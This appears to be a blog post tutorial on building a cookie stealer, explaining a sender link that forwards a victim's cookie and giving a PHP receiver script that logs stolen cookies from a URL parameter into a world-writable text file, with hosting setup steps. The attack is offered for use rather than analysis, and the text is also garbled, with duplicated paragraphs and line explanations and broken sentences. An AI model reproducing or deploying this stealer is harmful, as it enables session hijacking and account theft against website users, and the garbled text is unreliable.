How does a cookie stealer work. There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essense, it's just a
link to the receiver with the cookie somehow attached. It can sometimes
be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which
receives the cookie from the sender. It can also take several forms, but
the most common is that of a PHP document, most commonly found residing
on some obscure webserver.
Php Coding a receiver is the part. Only two things are needed to
make a receiver : a
web host / ftp which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
web host / ftp which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
As I said, the receiver's job is to receive the cookie from the
sender. Once the receiver has the cookie, it needs a way to get that
cookie to you.
<?php // line 1 $cookie = $HTTP_GET_VARS["cookie"]; // line 2 $file = fopen('cookielog.txt', 'a'); // line 3 fwrite($file, $cookie . "\n\n"); // line 4 ?> // line 5
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=xyz") and stores it in the variable $cookie.
Line 2 takes the cookie from the URL ("stealer.php?cookie=xyz") and stores it in the variable $cookie.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 Its the same as before.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 Its the same as before.
Its Done ! Just upload the files on ftp server and make permission of text file "cookielog.txt" to 777.
Content From: ICA
Content From: ICA
0 comments:
Post a Comment